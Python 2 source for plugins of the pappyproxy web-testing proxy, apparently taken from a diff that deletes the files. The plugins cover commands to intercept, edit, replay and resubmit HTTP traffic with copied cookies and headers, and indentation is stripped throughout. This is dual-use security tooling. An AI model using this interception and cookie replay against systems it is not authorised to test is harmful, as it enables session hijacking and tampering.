from pappyproxy.plugin import require_modules
from twisted.internet import defer
def cache_info(line):
c = Request.cache
print 'Cache has %d/%d slots filled' % (len(c._cached_reqs), c._cache_size)
print 'Hit score: {0:.2f} ({1}/{2})'.format(c.hit_ratio, c.hits, c.hits+c.misses)
print ''
if line != 'q':
rl = [v for k, v in Request.cache._cached_reqs.iteritems()]
rs = sorted(rl, key=lambda r: Request.cache._last_used[r.reqid], reverse=True)
print_requests(rs)
@require_modules('psutil')
def memory_info(line):
import psutil
proc = psutil.Process(os.getpid())
mem = proc.memory_info().rss
megabyte = (float(mem)/1024)/1024
print 'Memory usage: {0:.2f} Mb ({1} bytes)'.format(megabyte, mem)
@require_modules('guppy')
def heap_info(line):
size = heapstats.heap().size
print 'Heap usage: {0:.2f} Mb'.format(size/(1024.0*1024.0))
print heapstats.heap()
def limit_info(line):
rsrc = resource.RLIMIT_AS
soft, hard = resource.getrlimit(rsrc)
print 'Soft limit starts as:', soft
print 'Hard limit starts as:', hard
if line:
limit_mb = int(line)
limit_bytes = int(line)*1024*1024
print 'Setting limit to %s Mb' % limit_mb
resource.setrlimit(rsrc, (limit_bytes, hard)) # RLIMIT_AS is measured in bytes
soft, hard = resource.getrlimit(rsrc)
print 'Soft limit is now:', soft
print 'Hard limit is now:', hard
@require_modules('objgraph')
def graph_randobj(line):
import objgraph
args = shlex.split(line)
if len(args) > 1:
fname = args[1]
else:
fname = 'chain.png'
print 'Getting random %s object...' % args[0]
obj = random.choice(objgraph.by_type(args[0]))
print 'Creating chain...'
chain = objgraph.find_backref_chain(obj, objgraph.is_proper_module)
print 'Saving chain...'
objgraph.show_chain(chain, filename=fname)
def heapdo(line):
if heapstats is None:
raise PappyException('Command requires the guppy library')
h = heapstats.heap()
code.interact(local=locals())
def collect(line):
gc.collect()
@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def loadblock(line):
args = shlex.split(line)
yield Request.cache.load(args[0], int(args[1]))
@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def big_fucking_data_file(line):
print "Generating some giant fucking requests"
for i in range(1000):
if i % 20 == 0:
print 'Generated %d' % i
r = post_request('https://www.google.com')
r.body = 'A'*(1024*1024)
yield r.async_deep_save()
def time_cmd(line):
print 'Timing `%s`...' % line
start = datetime.datetime.now()
session.cons.onecmd(line.strip())
end = datetime.datetime.now()
total_time = (end-start).total_seconds()
print '`{0}` took {1:.3f} seconds'.format(line, total_time)
def cache_data(line):
args = shlex.split(line)
reqid = args[0]
cached = reqid in Request.cache._cached_reqs
if reqid in Request.cache._last_used:
last_used = Request.cache._last_used[reqid]
else:
last_used = 'NOT IN _last_used'
in_all = reqid in Request.cache.all_ids
in_unmangled = reqid in Request.cache.unmangled_ids
try:
ordered_ids_pos = Request.cache.ordered_ids.index(reqid)
except ValueError:
ordered_ids_pos = 'Not in ordered_ids'
in_inmem = reqid in Request.cache.inmem_reqs
print ''
print 'Cache data about request %s ----------' % reqid
print 'Cached: %s' % cached
print 'Last used: %s' % last_used
print 'In all_ids: %s' % in_all
print 'In unmangled: %s' % in_unmangled
print 'Ordered id pos: %s' % ordered_ids_pos
print 'Is inmem: %s' % in_inmem
print ''
def check_cache(line):
Request.cache.assert_ids()
def load_cmds(cmd):
cmd.set_cmds({
'cacheinfo': (cache_info, None),
'heapinfo': (heap_info, None),
'memlimit': (limit_info, None),
'heapdo': (heapdo, None),
'gccollect': (collect, None),
'graphobj': (graph_randobj, None),
'meminfo': (memory_info, None),
'genbigdata': (big_fucking_data_file, None),
'checkcache': (check_cache, None),
'loadblock': (loadblock, None),
'time': (time_cmd, None),
'cachedata': (cache_data, None),
})
cmd.add_aliases([
])

View file

@ -1,259 +0,0 @@
import crochet
import pappyproxy
from pappyproxy.util import PappyException, confirm, autocomplete_startswith
from pappyproxy.http import Request
from pappyproxy.context import save_context, delete_saved_context, get_saved_context, get_all_saved_contexts
from twisted.internet import defer
class BuiltinFilters(object):
_filters = {
'not_image': (
['path nctr "(\.png$|\.jpg$|\.gif$)"'],
'Filter out image requests',
),
'not_jscss': (
['path nctr "(\.js$|\.css$)"'],
'Filter out javascript and css files',
),
}
@staticmethod
@defer.inlineCallbacks
def get(name):
if name not in BuiltinFilters._filters:
raise PappyException('"%s" is not a built-in filter' % name)
if name in BuiltinFilters._filters:
filters = [pappyproxy.context.Filter(f) for f in BuiltinFilters._filters[name][0]]
for f in filters:
yield f.generate()
defer.returnValue(filters)
raise PappyException('"%s" is not a built-in filter' % name)
@staticmethod
def list():
return [k for k, v in BuiltinFilters._filters.iteritems()]
@staticmethod
def help(name):
if name not in BuiltinFilters._filters:
raise PappyException('"%s" is not a built-in filter' % name)
return BuiltinFilters._filters[name][1]
def complete_filtercmd(text, line, begidx, endidx):
strs = [k for k, v in pappyproxy.context.Filter._filter_functions.iteritems()]
strs += [k for k, v in pappyproxy.context.Filter._async_filter_functions.iteritems()]
return autocomplete_startswith(text, strs)
@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def filtercmd(line):
"""
Apply a filter to the current context
Usage: filter <filter string>
See README.md for information on filter strings
"""
if not line:
raise PappyException("Filter string required")
filter_to_add = pappyproxy.context.Filter(line)
yield filter_to_add.generate()
pappyproxy.pappy.main_context.add_filter(filter_to_add)
def complete_builtin_filter(text, line, begidx, endidx):
all_names = BuiltinFilters.list()
if not text:
ret = all_names[:]
else:
ret = [n for n in all_names if n.startswith(text)]
return ret
@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def builtin_filter(line):
if not line:
raise PappyException("Filter name required")
filters_to_add = yield BuiltinFilters.get(line)
for f in filters_to_add:
print f.filter_string
yield pappyproxy.pappy.main_context.add_filter(f)
defer.returnValue(None)
def filter_up(line):
"""
Remove the last applied filter
Usage: filter_up
"""
pappyproxy.pappy.main_context.filter_up()
def filter_clear(line):
"""
Reset the context so that it contains no filters (ignores scope)
Usage: filter_clear
"""
pappyproxy.pappy.main_context.set_filters([])
def filter_list(line):
"""
Print the filters that make up the current context
Usage: filter_list
"""
for f in pappyproxy.pappy.main_context.active_filters:
print f.filter_string
@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def scope_save(line):
"""
Set the scope to be the current context. Saved between launches
Usage: scope_save
"""
pappyproxy.context.save_scope(pappyproxy.pappy.main_context)
yield pappyproxy.context.store_scope(pappyproxy.http.dbpool)
@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def scope_reset(line):
"""
Set the context to be the scope (view in-scope items)
Usage: scope_reset
"""
yield pappyproxy.context.reset_to_scope(pappyproxy.pappy.main_context)
@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def scope_delete(line):
"""
Delete the scope so that it contains all request/response pairs
Usage: scope_delete
"""
pappyproxy.context.set_scope([])
yield pappyproxy.context.store_scope(pappyproxy.http.dbpool)
def scope_list(line):
"""
Print the filters that make up the scope
Usage: scope_list
"""
pappyproxy.context.print_scope()
#@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def filter_prune(line):
"""
Delete all out of context requests from the data file.
CANNOT BE UNDONE!! Be careful!
Usage: filter_prune
"""
# Delete filtered items from datafile
print ''
print 'Currently active filters:'
for f in pappyproxy.pappy.main_context.active_filters:
print '> %s' % f.filter_string
# We copy so that we're not removing items from a set we're iterating over
act_reqs = yield pappyproxy.pappy.main_context.get_reqs()
inact_reqs = set(Request.cache.req_ids()).difference(set(act_reqs))
message = 'This will delete %d/%d requests. You can NOT undo this!! Continue?' % (len(inact_reqs), (len(inact_reqs) + len(act_reqs)))
#print message
if not confirm(message, 'n'):
defer.returnValue(None)
for reqid in inact_reqs:
try:
req = yield pappyproxy.http.Request.load_request(reqid)
yield req.deep_delete()
except PappyException as e:
print e
print 'Deleted %d requests' % len(inact_reqs)
defer.returnValue(None)
@defer.inlineCallbacks
def _save_filters_to(key):
if key == '':
raise PappyException("Must give name to save filters as")
strs = pappyproxy.plugin.get_active_filter_strings()
yield save_context(key, strs, pappyproxy.http.dbpool)
defer.returnValue(strs)
@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def save_filter_set(line):
if line == '':
raise PappyException("Must give name to save filters as")
strs = yield _save_filters_to(line)
print 'Filters saved to %s:' % line
for s in strs:
print ' %s' % s
@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def load_filter_set(line):
if line == '':
raise PappyException("Must give name to save filters as")
strs = yield get_saved_context(line, pappyproxy.http.dbpool)
yield _save_filters_to('_')
pappyproxy.pappy.main_context.set_filters([])
for s in strs:
yield pappyproxy.pappy.main_context.add_filter_string(s)
print 'Set the context to:'
for s in strs:
print ' %s' % s
def delete_filter_set(line):
if line == '':
raise PappyException("Must give name to save filters as")
delete_saved_context(line, pappyproxy.http.dbpool)
@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def list_filter_set(line):
print 'Saved contexts:'
contexts = yield get_all_saved_contexts(pappyproxy.http.dbpool)
for k in sorted(contexts.keys()):
v = contexts[k]
print '%s' % k
for s in v:
print ' %s' % s
print ''
###############
## Plugin hooks
def load_cmds(cmd):
cmd.set_cmds({
'filter_prune': (filter_prune, None),
'scope_list': (scope_list, None),
'scope_delete': (scope_delete, None),
'scope_reset': (scope_reset, None),
'scope_save': (scope_save, None),
'filter_list': (filter_list, None),
'filter_clear': (filter_clear, None),
'filter_up': (filter_up, None),
'builtin_filter': (builtin_filter, complete_builtin_filter),
'filter': (filtercmd, complete_filtercmd),
'save_context': (save_filter_set, None),
'load_context': (load_filter_set, None),
'delete_context': (delete_filter_set, None),
'list_contexts': (list_filter_set, None),
})
cmd.add_aliases([
#('filter_prune', ''),
('scope_list', 'sls'),
#('scope_delete', ''),
('scope_reset', 'sr'),
#('scope_save', ''),
('filter_list', 'fls'),
('filter_clear', 'fc'),
('filter_up', 'fu'),
('builtin_filter', 'fbi'),
('filter', 'f'),
('filter', 'fl'),
('save_context', 'sc'),
('load_context', 'lc'),
('delete_context', 'dc'),
('list_contexts', 'cls'),
])
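# Every console plugin here follows the same contract: a load_cmds(cmd) hook
# registers command name -> (handler, completer) pairs, then maps short
# aliases onto them. A minimal hypothetical plugin of the same shape (the
# 'hello' command is illustrative, not part of pappy):
#
#   def hello(line):
#       """
#       Print a greeting
#       Usage: hello [name]
#       """
#       print 'Hello, %s!' % (line or 'world')
#
#   def load_cmds(cmd):
#       cmd.set_cmds({
#           'hello': (hello, None),  # None means no tab completer
#       })
#       cmd.add_aliases([
#           ('hello', 'hi'),
#       ])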


@@ -1,283 +0,0 @@
import crochet
import pappyproxy
import shlex
from pappyproxy.plugin import active_intercepting_macros, add_intercepting_macro, remove_intercepting_macro
from pappyproxy.macros import load_macros, macro_from_requests, MacroTemplate
from pappyproxy.util import PappyException, load_reqlist, autocomplete_startswith
from twisted.internet import defer
loaded_macros = []
loaded_int_macros = []
macro_dict = {}
int_macro_dict = {}
@defer.inlineCallbacks
def gen_macro_helper(line, template=None):
args = shlex.split(line)
if template is None:
fname = args[0]
template_name = args[1]
argstart = 2
else:
fname = args[0]
template_name = template
argstart = 1
if template_name not in MacroTemplate.template_list():
raise PappyException('%s is not a valid template name' % template_name)
script_str = yield MacroTemplate.fill_template_args(template_name, args[argstart:])
fname = MacroTemplate.template_filename(template_name, fname)
    with open(fname, 'w') as f:
f.write(script_str)
print 'Wrote script to %s' % fname
def load_macros_cmd(line):
"""
Load macros from a directory. By default loads macros in the current directory.
Usage: load_macros [dir]
"""
global macro_dict
global int_macro_dict
global loaded_macros
global loaded_int_macros
if line:
load_dir = line
else:
load_dir = '.'
(to_load, int_to_load) = load_macros(load_dir)
if not to_load and not int_to_load:
raise PappyException('No macros to load.')
macro_dict = {}
loaded_macros = []
int_macro_dict = {}
loaded_int_macros = []
for macro in to_load:
if macro.name in macro_dict:
print 'Name conflict in %s! "%s" already in use, not loading.' % (macro.filename, macro.name)
elif macro.short_name and macro.short_name in macro_dict:
print 'Name conflict in %s! "%s" already in use, not loading.' % (macro.filename, macro.short_name)
elif macro.file_name in macro_dict:
print 'Name conflict in %s! "%s" already in use, not loading.' % (macro.filename, macro.file_name)
else:
macro_dict[macro.name] = macro
macro_dict[macro.file_name] = macro
if macro.short_name:
macro_dict[macro.short_name] = macro
loaded_macros.append(macro)
print 'Loaded "%s"' % macro
for macro in int_to_load:
if macro.name in int_macro_dict:
print 'Name conflict in %s! "%s" already in use, not loading.' % (macro.filename, macro.name)
elif macro.short_name and macro.short_name in int_macro_dict:
print 'Name conflict in %s! "%s" already in use, not loading.' % (macro.filename, macro.short_name)
elif macro.file_name in int_macro_dict:
print 'Name conflict in %s! "%s" already in use, not loading.' % (macro.filename, macro.file_name)
else:
int_macro_dict[macro.name] = macro
int_macro_dict[macro.file_name] = macro
if macro.short_name:
int_macro_dict[macro.short_name] = macro
loaded_int_macros.append(macro)
print 'Loaded "%s"' % macro
def complete_run_macro(text, line, begidx, endidx):
global macro_dict
strs = [k for k,v in macro_dict.iteritems()]
return autocomplete_startswith(text, strs)
def run_macro(line):
"""
Run a macro
Usage: run_macro <macro name or macro short name>
"""
global macro_dict
global loaded_macros
args = shlex.split(line)
if not args:
raise PappyException('You must give a macro to run. You can give its short name, or the name in the filename.')
mname = args[0]
if mname not in macro_dict:
raise PappyException('%s not a loaded macro' % mname)
macro = macro_dict[mname]
macro.execute(args[1:])
def complete_run_int_macro(text, line, begidx, endidx):
global int_macro_dict
global loaded_int_macros
running = []
not_running = []
for macro in loaded_int_macros:
if macro.name in [m.name for m in active_intercepting_macros()]:
running.append(macro)
else:
not_running.append(macro)
strs = []
    for m in not_running:
        # Use the loop variable; the partition loop above left 'macro' bound
        strs.append(m.name)
        strs.append(m.file_name)
        if m.short_name:
            strs.append(m.short_name)
return autocomplete_startswith(text, strs)
def run_int_macro(line):
"""
Activate an intercepting macro
Usage: run_int_macro <macro name or macro short name>
Macro can be stopped with stop_int_macro
"""
global int_macro_dict
global loaded_int_macros
args = shlex.split(line)
if len(args) == 0:
raise PappyException('You must give an intercepting macro to run. You can give its short name, or the name in the filename.')
if args[0] not in int_macro_dict:
raise PappyException('%s not a loaded intercepting macro' % line)
macro = int_macro_dict[args[0]]
try:
macro.init(args[1:])
add_intercepting_macro(macro.name, macro)
print '"%s" started' % macro.name
except Exception as e:
print 'Error initializing macro:'
raise e
def complete_stop_int_macro(text, line, begidx, endidx):
global int_macro_dict
global loaded_int_macros
running = []
not_running = []
for macro in loaded_int_macros:
if macro.name in [m.name for m in active_intercepting_macros()]:
running.append(macro)
else:
not_running.append(macro)
strs = []
    for m in running:
        # Use the loop variable; the partition loop above left 'macro' bound
        strs.append(m.name)
        strs.append(m.file_name)
        if m.short_name:
            strs.append(m.short_name)
return autocomplete_startswith(text, strs)
def stop_int_macro(line):
"""
Stop a running intercepting macro
Usage: stop_int_macro <macro name or macro short name>
"""
global int_macro_dict
global loaded_int_macros
if not line:
        raise PappyException('You must give an intercepting macro to stop. You can give its short name, or the name in the filename.')
if line not in int_macro_dict:
raise PappyException('%s not a loaded intercepting macro' % line)
macro = int_macro_dict[line]
remove_intercepting_macro(macro.name)
print '"%s" stopped' % macro.name
def list_int_macros(line):
"""
List all active/inactive intercepting macros
"""
global int_macro_dict
global loaded_int_macros
running = []
not_running = []
for macro in loaded_int_macros:
if macro.name in [m.name for m in active_intercepting_macros()]:
running.append(macro)
else:
not_running.append(macro)
if not running and not not_running:
print 'No loaded intercepting macros'
if running:
print 'Active intercepting macros:'
for m in running:
print ' %s' % m
if not_running:
print 'Inactive intercepting macros:'
for m in not_running:
print ' %s' % m
@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def generate_macro(line):
"""
Generate a macro script with request objects
Usage: generate_macro <name> [reqs]
"""
yield gen_macro_helper(line, template='macro')
@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def generate_int_macro(line):
"""
Generate an intercepting macro script
Usage: generate_int_macro <name>
"""
yield gen_macro_helper(line, template='intmacro')
@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def generate_template_macro(line):
"""
Generate a macro from a built in template
Usage: generate_template_macro <fname> <template> [args]
"""
if line == '':
print 'Usage: gtma <fname> <template> [args]'
print 'Macro templates:'
templates = MacroTemplate.template_list()
templates.sort()
for t in templates:
if MacroTemplate.template_argstring(t):
print '"%s %s" - %s' % (t, MacroTemplate.template_argstring(t), MacroTemplate.template_description(t))
else:
print '"%s" - %s' % (t, MacroTemplate.template_description(t))
else:
yield gen_macro_helper(line)
@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def rpy(line):
"""
Copy python object definitions of requests.
Usage: rpy <reqs>
"""
reqs = yield load_reqlist(line)
for req in reqs:
print pappyproxy.macros.req_obj_def(req)
###############
## Plugin hooks
def load_cmds(cmd):
cmd.set_cmds({
'rpy': (rpy, None),
'generate_int_macro': (generate_int_macro, None),
'generate_macro': (generate_macro, None),
'generate_template_macro': (generate_template_macro, None),
'list_int_macros': (list_int_macros, None),
'stop_int_macro': (stop_int_macro, complete_stop_int_macro),
'run_int_macro': (run_int_macro, complete_run_int_macro),
'run_macro': (run_macro, complete_run_macro),
'load_macros': (load_macros_cmd, None),
})
cmd.add_aliases([
#('rpy', ''),
('generate_int_macro', 'gima'),
('generate_macro', 'gma'),
('generate_template_macro', 'gtma'),
('list_int_macros', 'lsim'),
('stop_int_macro', 'sim'),
('run_int_macro', 'rim'),
('run_macro', 'rma'),
('load_macros', 'lma'),
])


@@ -1,292 +0,0 @@
import crochet
import curses
import os
import pappyproxy
import shlex
import subprocess
import tempfile
from pappyproxy.util import PappyException
from pappyproxy.macros import InterceptMacro
from pappyproxy.http import Request, Response
from pappyproxy.plugin import add_intercepting_macro, remove_intercepting_macro
from pappyproxy import pappy
from twisted.internet import defer
PLUGIN_ID="manglecmds"
edit_queue = []
class MangleInterceptMacro(InterceptMacro):
"""
A class representing a macro that modifies requests as they pass through the
proxy
"""
def __init__(self):
InterceptMacro.__init__(self)
self.name = 'Pappy Interceptor Macro'
self.intercept_requests = False
self.intercept_responses = False
self.intercept_ws = False
self.async_req = True
self.async_rsp = True
self.async_ws = True
def __repr__(self):
return "<MangleInterceptingMacro>"
@defer.inlineCallbacks
def async_mangle_request(self, request):
# This function gets called to mangle/edit requests passed through the proxy
retreq = request
# Write original request to the temp file
with tempfile.NamedTemporaryFile(delete=False) as tf:
tfName = tf.name
tf.write(request.full_request)
# Have the console edit the file
yield edit_file(tfName)
# Create new mangled request from edited file
with open(tfName, 'r') as f:
text = f.read()
os.remove(tfName)
# Check if dropped
if text == '':
pappyproxy.proxy.log('Request dropped!')
defer.returnValue(None)
mangled_req = Request(text, update_content_length=True)
mangled_req._host = request.host
mangled_req.port = request.port
mangled_req.is_ssl = request.is_ssl
# Check if it changed
if mangled_req.full_request != request.full_request:
retreq = mangled_req
defer.returnValue(retreq)
@defer.inlineCallbacks
def async_mangle_response(self, request):
        # This function gets called to mangle/edit responses passed through the proxy
retrsp = request.response
# Write original response to the temp file
with tempfile.NamedTemporaryFile(delete=False) as tf:
tfName = tf.name
tf.write(request.response.full_response)
# Have the console edit the file
yield edit_file(tfName, front=True)
# Create new mangled response from edited file
with open(tfName, 'r') as f:
text = f.read()
os.remove(tfName)
# Check if dropped
if text == '':
pappyproxy.proxy.log('Response dropped!')
defer.returnValue(None)
mangled_rsp = Response(text, update_content_length=True)
if mangled_rsp.full_response != request.response.full_response:
mangled_rsp.unmangled = request.response
retrsp = mangled_rsp
defer.returnValue(retrsp)
@defer.inlineCallbacks
def async_mangle_ws(self, request, message):
        # This function gets called to mangle/edit websocket messages passed through the proxy
retmsg = message
# Write original message to the temp file
with tempfile.NamedTemporaryFile(delete=False) as tf:
tfName = tf.name
tf.write(retmsg.contents)
# Have the console edit the file
yield edit_file(tfName, front=True)
# Create new mangled message from edited file
with open(tfName, 'r') as f:
text = f.read()
os.remove(tfName)
# Check if dropped
if text == '':
pappyproxy.proxy.log('Websocket message dropped!')
defer.returnValue(None)
mangled_message = message.copy()
mangled_message.contents = text
if mangled_message.contents != message.contents:
retmsg = mangled_message
defer.returnValue(retmsg)
###############
## Helper funcs
def edit_file(fname, front=False):
global edit_queue
# Adds the filename to the edit queue. Returns a deferred that is fired once
# the file is edited and the editor is closed
d = defer.Deferred()
if front:
edit_queue = [(fname, d)] + edit_queue
else:
edit_queue.append((fname, d))
return d
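# The three async_mangle_* methods above repeat the same write/edit/read
# round trip. A hedged sketch of how that shared step could be factored out
# (this helper is not part of the original module; an empty file maps to
# None to signal a drop, mirroring the checks above):
@defer.inlineCallbacks
def _edit_contents_sketch(contents):
    # Write the original bytes to a temp file that outlives the handle
    with tempfile.NamedTemporaryFile(delete=False) as tf:
        tfName = tf.name
        tf.write(contents)
    # Block until the console has run an editor over the file
    yield edit_file(tfName)
    # Read the edited bytes back and clean up
    with open(tfName, 'r') as f:
        text = f.read()
    os.remove(tfName)
    defer.returnValue(text or None)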
@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def check_reqid(reqid):
# Used for the repeater command. Must not be async
try:
yield pappyproxy.http.Request.load_request(reqid)
except:
raise PappyException('"%s" is not a valid request id' % reqid)
defer.returnValue(None)
def start_editor(reqid):
script_loc = os.path.join(pappy.session.config.pappy_dir, "plugins", "vim_repeater", "repeater.vim")
subprocess.call(["vim", "-S", script_loc, "-c", "RepeaterSetup %s %d"%(reqid, pappy.session.comm_port)])
####################
## Command functions
def repeater(line):
"""
Open a request in the repeater
Usage: repeater <reqid>
"""
# This is not async on purpose. start_editor acts up if this is called
# with inline callbacks. As a result, check_reqid and get_unmangled
# cannot be async
args = shlex.split(line)
reqid = args[0]
check_reqid(reqid)
start_editor(reqid)
def intercept(line):
"""
    Intercept requests and/or responses and edit them before passing them along
Usage: intercept <reqid>
"""
global edit_queue
args = shlex.split(line)
intercept_requests = False
intercept_responses = False
    intercept_ws = False
req_names = ('req', 'request', 'requests')
rsp_names = ('rsp', 'response', 'responses')
ws_names = ('ws', 'websocket')
if any(a in req_names for a in args):
intercept_requests = True
if any(a in rsp_names for a in args):
intercept_responses = True
    if any(a in ws_names for a in args):
intercept_ws = True
if not args:
intercept_requests = True
intercepting = []
if intercept_requests:
intercepting.append('Requests')
if intercept_responses:
intercepting.append('Responses')
if intercept_ws:
intercepting.append('Websocket Messages')
if not intercept_requests and not intercept_responses and not intercept_ws:
intercept_str = 'NOTHING'
else:
intercept_str = ', '.join(intercepting)
mangle_macro = MangleInterceptMacro()
mangle_macro.intercept_requests = intercept_requests
mangle_macro.intercept_responses = intercept_responses
mangle_macro.intercept_ws = intercept_ws
add_intercepting_macro('pappy_intercept', mangle_macro)
## Interceptor loop
stdscr = curses.initscr()
curses.noecho()
curses.cbreak()
try:
editnext = False
stdscr.nodelay(True)
while True:
stdscr.addstr(0, 0, "Currently intercepting: %s" % intercept_str)
stdscr.clrtoeol()
stdscr.addstr(1, 0, "%d item(s) in queue." % len(edit_queue))
stdscr.clrtoeol()
if editnext:
stdscr.addstr(2, 0, "Waiting for next item... Press 'q' to quit or 'b' to quit waiting")
else:
stdscr.addstr(2, 0, "Press 'n' to edit the next item or 'q' to quit interceptor.")
stdscr.clrtoeol()
c = stdscr.getch()
if c == ord('q'):
break
elif c == ord('n'):
editnext = True
elif c == ord('b'):
editnext = False
if editnext and edit_queue:
editnext = False
(to_edit, deferred) = edit_queue.pop(0)
editor = 'vi'
if 'EDITOR' in os.environ:
editor = os.environ['EDITOR']
additional_args = []
if editor == 'vim':
# prevent adding additional newline
additional_args.append('-b')
subprocess.call([editor, to_edit] + additional_args)
stdscr.clear()
deferred.callback(None)
finally:
curses.nocbreak()
stdscr.keypad(0)
curses.echo()
curses.endwin()
try:
remove_intercepting_macro('pappy_intercept')
except PappyException:
pass
# Send remaining requests along
while len(edit_queue) > 0:
(fname, deferred) = edit_queue.pop(0)
deferred.callback(None)
###############
## Plugin hooks
def load_cmds(cmd):
cmd.set_cmds({
'intercept': (intercept, None),
'repeater': (repeater, None),
})
cmd.add_aliases([
('intercept', 'ic'),
('repeater', 'rp'),
])


@@ -1,275 +0,0 @@
import argparse
import crochet
import pappyproxy
import shlex
import sys
from pappyproxy.colors import Colors, Styles, path_formatter, host_color, scode_color, verb_color
from pappyproxy.util import PappyException, remove_color, confirm, load_reqlist, Capturing
from pappyproxy.macros import InterceptMacro
from pappyproxy.requestcache import RequestCache
from pappyproxy.session import Session
from pappyproxy.pappy import session
from pappyproxy.plugin import add_intercepting_macro, remove_intercepting_macro, add_to_history
from pappyproxy.http import async_submit_requests, Request
from twisted.internet import defer
from twisted.enterprise import adbapi
class PrintStreamInterceptMacro(InterceptMacro):
"""
Intercepting macro that prints requests and responses as they go through
the proxy
"""
def __init__(self):
InterceptMacro.__init__(self)
self.name = 'Pappy Interceptor Macro'
self.intercept_requests = False
self.intercept_responses = False
self.async_req = False
self.async_rsp = False
def __repr__(self):
return "<PrintStreamInterceptingMacro>"
@staticmethod
def _print_request(req):
s = verb_color(req.verb)+'> '+req.verb+' '+Colors.ENDC
s += req.url_color
s += ', len=' + str(len(req.body))
print s
sys.stdout.flush()
@staticmethod
def _print_response(req):
response_code = str(req.response.response_code) + \
' ' + req.response.response_text
s = scode_color(response_code)
s += '< '
s += response_code
s += Colors.ENDC
s += ' '
s += req.url_color
s += ', len=' + str(len(req.response.body))
print s
sys.stdout.flush()
def mangle_request(self, request):
PrintStreamInterceptMacro._print_request(request)
return request
def mangle_response(self, request):
PrintStreamInterceptMacro._print_response(request)
return request.response
@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def clrmem(line):
"""
Delete all in-memory only requests
Usage: clrmem
"""
to_delete = list(pappyproxy.http.Request.cache.inmem_reqs)
for r in to_delete:
try:
yield r.deep_delete()
except PappyException as e:
print str(e)
def gencerts(line):
"""
Generate CA cert and private CA file
Usage: gencerts [/path/to/put/certs/in]
"""
dest_dir = line or pappyproxy.pappy.session.config.cert_dir
message = "This will overwrite any existing certs in %s. Are you sure?" % dest_dir
if not confirm(message, 'n'):
return False
print "Generating certs to %s" % dest_dir
pappyproxy.proxy.generate_ca_certs(dest_dir)
def log(line):
"""
Display the log in real time. Honestly it probably doesn't work.
Usage: log [verbosity (default is 1)]
verbosity=1: Show connections as they're made/lost, some additional info
verbosity=3: Show full requests/responses as they are processed by the proxy
"""
try:
verbosity = int(line.strip())
except:
verbosity = 1
pappyproxy.pappy.session.config.debug_verbosity = verbosity
raw_input()
pappyproxy.pappy.session.config.debug_verbosity = 0
@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def save(line):
args = shlex.split(line)
reqids = args[0]
reqs = yield load_reqlist(reqids)
for req in reqs:
yield req.async_deep_save()
@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def export(line):
"""
Write the full request/response of a request/response to a file.
Usage: export [req|rsp] <reqid(s)>
"""
args = shlex.split(line)
if len(args) < 2:
        print 'Requires req/rsp and request id(s)'
defer.returnValue(None)
if args[0] not in ('req', 'rsp'):
raise PappyException('Request or response not specified')
reqs = yield load_reqlist(args[1])
for req in reqs:
try:
if args[0] == 'req':
fname = 'req_%s.txt'%req.reqid
with open(fname, 'w') as f:
f.write(req.full_request)
print 'Full request written to %s' % fname
elif args[0] == 'rsp':
fname = 'rsp_%s.txt'%req.reqid
with open(fname, 'w') as f:
f.write(req.full_response)
print 'Full response written to %s' % fname
except PappyException as e:
print 'Unable to export %s: %s' % (req.reqid, e)
@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def merge_datafile(line):
"""
Add all the requests/responses from another data file to the current one
"""
def set_text_factory(conn):
conn.text_factory = str
line = line.strip()
other_dbpool = adbapi.ConnectionPool("sqlite3", line,
check_same_thread=False,
cp_openfun=set_text_factory,
cp_max=1)
try:
count = 0
other_cache = RequestCache(cust_dbpool=other_dbpool)
yield other_cache.load_ids()
for req_d in other_cache.req_it():
count += 1
req = yield req_d
r = req.copy()
yield r.async_deep_save()
print 'Added %d requests' % count
finally:
other_dbpool.close()
def watch_proxy(line):
print 'Watching proxy... press ENTER to exit'
macro = PrintStreamInterceptMacro()
macro.intercept_requests = True
macro.intercept_responses = True
try:
add_intercepting_macro('pappy_watch_proxy', macro)
raw_input()
finally:
try:
remove_intercepting_macro('pappy_watch_proxy')
except PappyException:
pass
def run_without_color(line):
with Capturing() as output:
session.cons.onecmd(line.strip())
print remove_color(output.val)
def version(line):
import pappyproxy
print pappyproxy.__version__
@crochet.wait_for(timeout=180.0)
@defer.inlineCallbacks
def submit(line):
"""
Resubmit some requests, optionally with modified headers and cookies.
Usage: submit reqids [-h] [-m] [-u] [-p] [-o REQID] [-c [COOKIES [COOKIES ...]]] [-d [HEADERS [HEADERS ...]]]
"""
parser = argparse.ArgumentParser(prog="submit", usage=submit.__doc__)
parser.add_argument('reqids')
parser.add_argument('-m', '--inmem', action='store_true', help='Store resubmitted requests in memory without storing them in the data file')
parser.add_argument('-u', '--unique', action='store_true', help='Only resubmit one request per endpoint (different URL parameters are different endpoints)')
parser.add_argument('-p', '--uniquepath', action='store_true', help='Only resubmit one request per endpoint (ignoring URL parameters)')
parser.add_argument('-c', '--cookies', nargs='*', help='Apply a cookie to requests before submitting')
parser.add_argument('-d', '--headers', nargs='*', help='Apply a header to requests before submitting')
parser.add_argument('-o', '--copycookies', help='Copy the cookies used in another request')
args = parser.parse_args(shlex.split(line))
headers = {}
cookies = {}
clear_cookies = False
if args.headers:
for h in args.headers:
k, v = h.split('=', 1)
headers[k] = v
if args.copycookies:
reqid = args.copycookies
req = yield Request.load_request(reqid)
clear_cookies = True
for k, v in req.cookies.all_pairs():
cookies[k] = v
if args.cookies:
for c in args.cookies:
k, v = c.split('=', 1)
cookies[k] = v
if args.unique and args.uniquepath:
raise PappyException('Both -u and -p cannot be given as arguments')
newsession = Session(cookie_vals=cookies, header_vals=headers)
